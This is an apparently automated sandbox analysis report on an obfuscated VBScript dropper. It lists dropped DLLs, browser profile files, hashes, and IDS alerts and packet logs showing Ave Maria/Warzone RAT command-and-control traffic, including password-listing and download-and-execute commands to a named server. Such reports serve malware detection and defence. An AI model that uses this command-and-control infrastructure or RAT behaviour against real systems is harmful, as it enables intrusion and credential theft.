                                                                                    SHA-256:2B00FC4F541AC10C94E3556FF28E30A801811C36422546A546A445ACA3F410F7
                                                                                    SHA-512:2AA62BFBA556AD8F042942DD25AA071FF6677C257904377C1EC956FD9E862ABCBF379E0CFD8C630C303A32ECE75618C24E3EEF58BDDB705C427985B944689193
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Joe Sandbox View:
                                                                                    • Filename: 17265837652d55c0f124ae83612d8bd5caa1d7f12d178ec09d2162f830ec997362a0f3d454121.dat-decoded.exe, Detection: malicious, Browse
                                                                                    • Filename: BqM3S4dN0J.exe, Detection: malicious, Browse
                                                                                    • Filename: Julcbozqsvtzlo.cmd, Detection: malicious, Browse
                                                                                    • Filename: Nordsee Energy Project _Firm RFQ_KE-24826.exe, Detection: malicious, Browse
                                                                                    • Filename: ORDER883274777724884pdf.vbs, Detection: malicious, Browse
                                                                                    • Filename: 17194198846f19431fa86ff695fe063dadb4561f59dac5dc011432c27d123f4314e8bbacda424.dat-decoded.exe, Detection: malicious, Browse
                                                                                    • Filename: 8x121Y7FNW.js, Detection: malicious, Browse
                                                                                    • Filename: e9d0af516a8d65649c6850b69ff15e65cba280f8d44dbc505882dd16cf922320_dump.exe, Detection: malicious, Browse
                                                                                    • Filename: filedoc3720001.exe, Detection: malicious, Browse
                                                                                    • Filename: 6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L...BW.[.........."!.........f......)........................................p......3R....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):137168
                                                                                    Entropy (8bit):6.782906762178928
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:4kdWyaKm15vd/q/Py9UbfkVgxp1qt/t3PvT4UD2JJJvPBrSezRy:Fdtm15vtSfkVgxp12/t3PLxD2JJJvPQZ
                                                                                    MD5:75F8CC548CABF0CC800C25047E4D3124
                                                                                    SHA1:602676768F9FAECD35B48C38A0632781DFBDE10C
                                                                                    SHA-256:FB419A60305F17359E2AC0510233EE80E845885EEE60607715C67DD88E501EF0
                                                                                    SHA-512:ED831C9C769AEF3BE253C52542CF032AFA0A8FA5FE25CA704DB65EE6883C608220DF7102AC2B99EE9C2E599A0F5DB99FD86894A4B169E68440EB1B0D0012672F
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Joe Sandbox View:
                                                                                    • Filename: 17265837652d55c0f124ae83612d8bd5caa1d7f12d178ec09d2162f830ec997362a0f3d454121.dat-decoded.exe, Detection: malicious, Browse
                                                                                    • Filename: BqM3S4dN0J.exe, Detection: malicious, Browse
                                                                                    • Filename: Julcbozqsvtzlo.cmd, Detection: malicious, Browse
                                                                                    • Filename: Nordsee Energy Project _Firm RFQ_KE-24826.exe, Detection: malicious, Browse
                                                                                    • Filename: ORDER883274777724884pdf.vbs, Detection: malicious, Browse
                                                                                    • Filename: 17194198846f19431fa86ff695fe063dadb4561f59dac5dc011432c27d123f4314e8bbacda424.dat-decoded.exe, Detection: malicious, Browse
                                                                                    • Filename: 8x121Y7FNW.js, Detection: malicious, Browse
                                                                                    • Filename: e9d0af516a8d65649c6850b69ff15e65cba280f8d44dbc505882dd16cf922320_dump.exe, Detection: malicious, Browse
                                                                                    • Filename: filedoc3720001.exe, Detection: malicious, Browse
                                                                                    • Filename: 6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L....T.[.........."!.....z...................................................@............@A........................ ...t.......,.... ..x....................0..h......T...................4.......H...@...................L........................text....x.......z.................. ..`.rdata..>e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):440120
                                                                                    Entropy (8bit):6.652844702578311
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                    MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                    SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                    SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                    SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:modified
                                                                                    Size (bytes):1246160
                                                                                    Entropy (8bit):6.76559888004065
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:Ab5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRpMxkxo:+zW5ygDwnEZIYkjgWjblMSRpMqm
                                                                                    MD5:D7858E8449004E21B01D468E9FD04B82
                                                                                    SHA1:9524352071EDE21C167E7E4F106E9526DC23EF4E
                                                                                    SHA-256:78758BF7F3B3B5E3477E38354ACD32D787BC1286C8BD9B873471B9C195E638DB
                                                                                    SHA-512:1E2C981E6C0CA36C60C6E9CAE9548B866D5C524DF837095B30D618D9C322DEF7134C20DE820105400DD1B58076B66D90274F67773AC6BA914F611B419BABB440
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L...#W.[.........."!................w........................................@...........@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):144848
                                                                                    Entropy (8bit):6.539673483315818
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:0Af6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWPqeFYMMa:J6PbsF4CoT2OeN43Ma
                                                                                    MD5:471C983513694AC3002590345F2BE0DA
                                                                                    SHA1:6612B9AF4FF6830FA9B7D4193078434EF72F775B
                                                                                    SHA-256:BB3FF746471116C6AD0339FA0522AA2A44A787E33A29C7B27649A054ECD4D00F
                                                                                    SHA-512:A9B0FB923BC3B567E933DE10B141A3E9213640E3D790B4C4D753CF220D55593AE8026102909969BA6BFC22DA3B2FCD01E30A9F5A74BD14A0FDEC9BEAF0FB1410
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L...+W.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):83784
                                                                                    Entropy (8bit):6.890347360270656
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                    MD5:7587BF9CB4147022CD5681B015183046
                                                                                    SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                    SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                    SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                    Category:dropped
                                                                                    Size (bytes):51200
                                                                                    Entropy (8bit):0.8746135976761988
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):601509
                                                                                    Entropy (8bit):6.009032047307258
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:v/zUE3ETdHB+LeuC6MeAOXw6VwIHDIu62IPXjHV:X6RHw1C6MqgIDjyPT1
                                                                                    MD5:42C2EBC54581AC47FB5D8F01902DCEBF
                                                                                    SHA1:706A4A789DEB72F11BD47B29417D06B083BD302F
                                                                                    SHA-256:AF5EEFB41935639C5D8FCD3D6DA834832B62A44A93E856898C2664C6B7F78735
                                                                                    SHA-512:8E391DE3E857F9E448E5A4478AC170C7CEB9E1D9B5904BF9B0491D68BFA3076EB1315159F94ED3D85A4895DC71D14C7774073B602C18AE0EF833A9876E199913
                                                                                    Malicious:false
                                                                                    Preview:{"browser":{"first_run_finished":true,"shortcut_migration_version":"117.0.5938.149"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.696499469977869e+12,"network":1.69649947e+12,"ticks":950784969.0,"uncertainty":2115320.0}},"os_crypt":{"app_bound_fixed_data":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAG7I4XamucEiJgTIvWNrX8QAAAAACAAAAAAAQZgAAAAEAACAAAAD/i5iZthvbAMtQI7LwVpFb6jmIRlnZBn3BOL+GZt4kogAAAAAOgAAAAAIAACAAAABrT9mzRTsNQCdkuszmZKjpexNj6pJ09kyX6bwi+21l8WABAAC2oOGGveU6vtEtyQAIMBMXo7f864ZX39/zY32wXs2ycQ6SoKTjYg7Br2GFeNLLP279dGg8Zuzkl8PZaQtQPJ+wYAAvzw/sRMCe0iF3uJ7Kw9zB62X16c4T+scYcq9Dmqv88jZ9QpusCOnz2QdwDmnuAjYAEFaWbKP7uQ+SnzdDWQHVXD1+dwbZpQWa8x21LgEmlB/JwHBUlXnGTlbJNM/86NOp0VESKNzRg9tYvr0QOVTugQn/8kgsBWz2hnKxt6/JKyLjCqmGrrVwBIqp4h98HPLgssce9hMqhqambQ6wEZM9vPGGQNfobT/qUkNaQU6RWKKKvKUTpYhs1Bsu5t24JQ6PZ4
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                    Category:dropped
                                                                                    Size (bytes):40960
                                                                                    Entropy (8bit):0.8553638852307782
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):41554
                                                                                    Entropy (8bit):6.092063318051665
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kozUXqgfbRFXUqNNJ8vQYqGwLWZkHUfG6kCvoc:z/Ps+wsI7yndsDqfyW0e6kaoc
                                                                                    MD5:51103BDEC12BF3AB1D77859A5428CB8F
                                                                                    SHA1:9CDEA877EC32997269EEA396BF5453D7E7BB6D08
                                                                                    SHA-256:1360FD6D8A494282867F0F78B89359F675DF5897C596AF9A735B5B3985E26A98
                                                                                    SHA-512:D023812335ADA1F689580D4E6E02E9B9C888B86E3B6C2B73B8DA91D0824F69AEFEF1E7913186D0ADC4ED6AD029C3E67BE41CADFA25E551460F1C2FA3F45C3B9F
                                                                                    Malicious:false
                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                    File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Entropy (8bit):3.7438161969409154
                                                                                    TrID:
                                                                                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                    • MP3 audio (1001/1) 32.22%
                                                                                    • Lumena CEL bitmap (63/63) 2.03%
                                                                                    • Corel Photo Paint (41/41) 1.32%
                                                                                    File name:89SkYNNpdi.vbs
                                                                                    File size:520'010 bytes
                                                                                    MD5:8826da2dae531f219269ca314cec4f88
                                                                                    SHA1:a5c24e29d2b9901a0849fe4c70dd67733febcb57
                                                                                    SHA256:3ca2d0a1abba4f885e740032d2314993fac09ffffe14a4c6a89aacf65684e45b
                                                                                    SHA512:9899a75d918671927f0dce5824135427899d75c88c153f78e8fa9ca5d39383a2cb33d092376ae631f507a3bd855636968724d9509d180e2c3a0a307a697e7de5
                                                                                    SSDEEP:12288:r4IJKsC/UX6neBCN6Jy7f24Sjmr8NeAkWrIXbl/MCmgdTQFq30+XDNNRsgbZAKIo:kkgn2MHhso/
                                                                                    TLSH:FEB40A1135EAB048F1F32FA356F955E98FABB5652A36911E7048070F4BA3E80CE51B73
                                                                                    File Content Preview:..c.P.c.U.f.o.f.r.W.R.K.L.L.G.n.f.k.r.e.v.e.z.a.m.e.n.t.o.d.U.m.C.U.L.o.i.o.W.k.a.P.A.P.R.r.U.v.H.S.f.W.x.B.W.N.W.m.n.c.I.d.L.c.m.j.q.I.e.U.k.K.f.H.Z.t.v.i. .=. .".i.A.m.K.d.v.L.L.k.h.L.t.c.t.e.A.L.f.t.R.e.k.v.h.G.z.G.b.t.c.a.b.c.u.i.K.q.k.n.O.A.s.h.R.L.Z
                                                                                    Icon Hash:68d69b8f86ab9a86
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-10-02T05:23:16.346506+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11162.159.140.237443192.168.2.1049703TCP
                                                                                    2024-10-02T05:23:16.346506+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11162.159.140.237443192.168.2.1049703TCP
                                                                                    2024-10-02T05:23:16.347330+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11162.159.140.237443192.168.2.1049703TCP
                                                                                    2024-10-02T05:23:18.751952+02002852346ETPRO MALWARE Ave Maria/Warzone RAT InitializePacket1109.248.151.1562048192.168.2.1049704TCP
                                                                                    2024-10-02T05:23:18.968471+02002852347ETPRO MALWARE Ave Maria/Warzone RAT BeaconResponse1192.168.2.1049704109.248.151.1562048TCP
                                                                                    2024-10-02T05:23:19.190136+02002852350ETPRO MALWARE Ave Maria/Warzone RAT ListPasswordsCommand1109.248.151.1562048192.168.2.1049704TCP
                                                                                    2024-10-02T05:23:19.191606+02002839089ETPRO MALWARE Ave Maria RAT Encrypted CnC Checkin (2)1192.168.2.1049704109.248.151.1562048TCP
                                                                                    2024-10-02T05:23:19.191606+02002852352ETPRO MALWARE Ave Maria/Warzone RAT DownloadAndExecuteCommand1192.168.2.1049704109.248.151.1562048TCP
                                                                                    2024-10-02T05:23:19.191606+02002852355ETPRO MALWARE Ave Maria/Warzone RAT VNCGetModule1192.168.2.1049704109.248.151.1562048TCP
                                                                                    2024-10-02T05:23:19.398141+02002852354ETPRO MALWARE Ave Maria/Warzone RAT RemoteModuleLoadResponse1109.248.151.1562048192.168.2.1049704TCP
                                                                                    2024-10-02T05:23:22.453000+02002839088ETPRO MALWARE Ave Maria RAT Encrypted CnC KeepAlive Outbound (2)1192.168.2.1049704109.248.151.1562048TCP
                                                                                    2024-10-02T05:23:22.453000+02002852351ETPRO MALWARE Ave Maria/Warzone RAT ListPasswordsResponse1192.168.2.1049704109.248.151.1562048TCP
                                                                                    2024-10-02T05:23:38.752603+02002839087ETPRO MALWARE Ave Maria RAT Encrypted CnC KeepAlive Inbound (2)1109.248.151.1562048192.168.2.1049704TCP
                                                                                    2024-10-02T05:23:38.752603+02002852348ETPRO MALWARE Ave Maria/Warzone RAT PingCommand1109.248.151.1562048192.168.2.1049704TCP
                                                                                    2024-10-02T05:23:38.752895+02002851450ETPRO MALWARE Ave Maria RAT Encrypted CnC KeepAlive Outbound (3)1192.168.2.1049704109.248.151.1562048TCP
                                                                                    2024-10-02T05:23:38.752895+02002852349ETPRO MALWARE Ave Maria/Warzone RAT PingResponse1192.168.2.1049704109.248.151.1562048TCP
                                                                                    2024-10-02T05:24:18.755283+02002852348ETPRO MALWARE Ave Maria/Warzone RAT PingCommand1109.248.151.1562048192.168.2.1049704TCP
                                                                                    2024-10-02T05:24:18.755920+02002852349ETPRO MALWARE Ave Maria/Warzone RAT PingResponse1192.168.2.1049704109.248.151.1562048TCP
                                                                                    2024-10-02T05:24:58.769522+02002852348ETPRO MALWARE Ave Maria/Warzone RAT PingCommand1109.248.151.1562048192.168.2.1049704TCP
                                                                                    2024-10-02T05:24:58.770155+02002852349ETPRO MALWARE Ave Maria/Warzone RAT PingResponse1192.168.2.1049704109.248.151.1562048TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 2, 2024 05:23:11.708261967 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:11.708302021 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:11.708369017 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:11.722255945 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:11.722273111 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.332632065 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.332834959 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.382555008 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.382601976 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.382946014 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.414331913 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.459404945 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.657042980 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.657064915 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.657150984 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.657155037 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.657169104 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.657182932 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.657203913 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.657226086 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.657250881 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.670726061 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.670753002 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.670840979 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.670855045 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.670898914 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.712677956 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.712721109 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.712807894 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.712840080 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.712860107 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.712886095 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.760207891 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.760235071 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.760325909 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.760360003 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.760432005 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.761466980 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.761488914 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.761543989 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.761552095 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.761579990 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.761598110 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.763211012 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.763231039 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.763277054 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.763283968 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.763377905 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.827244043 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.827275991 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.827419043 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.827472925 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.827543974 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.851846933 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.851872921 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.852071047 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.852097034 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.852154970 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.852725983 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.852751970 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.852826118 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:12.852840900 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:12.852874041 CEST49702443192.168.2.10207.241.227.240
